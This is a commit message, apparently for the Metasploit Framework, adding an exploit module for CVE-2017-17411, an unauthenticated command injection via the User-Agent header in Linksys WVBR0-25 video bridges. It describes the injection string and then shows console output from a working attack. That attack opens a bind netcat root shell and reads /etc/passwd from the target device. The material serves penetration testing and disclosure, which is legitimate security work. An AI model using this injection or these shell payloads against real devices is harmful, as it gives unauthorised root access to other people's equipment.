headlesszeke 2ee42e1433 Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
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